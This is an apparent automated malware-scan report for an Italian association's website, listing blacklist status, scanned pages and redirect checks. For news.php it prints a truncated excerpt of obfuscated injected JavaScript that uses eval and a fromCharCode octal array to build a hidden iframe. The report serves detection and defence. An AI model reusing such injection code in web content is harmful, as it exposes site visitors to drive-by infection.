Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tuteladipuntaala.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tuteladipuntaala.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tuteladipuntaala.org/ | 200 OK Content-Length: 26761 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://tuteladipuntaala.org/index.php | 200 OK Content-Length: 26761 Content-Type: text/html | clean |
http://tuteladipuntaala.org/associazione.php | 200 OK Content-Length: 14077 Content-Type: text/html | clean |
http://tuteladipuntaala.org/presentazione.php | 200 OK Content-Length: 14933 Content-Type: text/html | clean |
http://tuteladipuntaala.org/statuto.php | 200 OK Content-Length: 49012 Content-Type: text/html | clean |
http://tuteladipuntaala.org/download/Statuto Tutela di Punta Ala.pdf | 200 OK Content-Length: 300940 Content-Type: application/pdf | clean |
http://tuteladipuntaala.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://tuteladipuntaala.org/sondaggi/index.php | 404 Not Found Content-Length: 335 Content-Type: text/html | clean |
http://tuteladipuntaala.org/obiettivi.php | 200 OK Content-Length: 15201 Content-Type: text/html | clean |
http://tuteladipuntaala.org/soci/index.php | 200 OK Content-Length: 19280 Content-Type: text/html | clean |
http://tuteladipuntaala.org/iscrizione.php | 200 OK Content-Length: 22289 Content-Type: text/html | clean |
http://tuteladipuntaala.org/news.php | 200 OK Content-Length: 274969 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,0 Antivirus reports:
| ||
http://tuteladipuntaala.org/news/approfondimento.php?subaction=showfull&id=1348075362&archive=&start_from=&ucat=& | 200 OK Content-Length: 17850 Content-Type: text/html | clean |
http://www.tuteladipuntaala.org/news/remember.js | 200 OK Content-Length: 2246 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tuteladipuntaala.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Apr 2014 09:46:31 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: tuteladipuntaala.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Apr 2014 09:46:31 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: tuteladipuntaala.org
Referer: http://www.google.com/search?q=tuteladipuntaala.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tuteladipuntaala.org
Referer: http://www.google.com/search?q=tuteladipuntaala.org
Result:
The result is similar to the first query. There are no suspicious redirects found.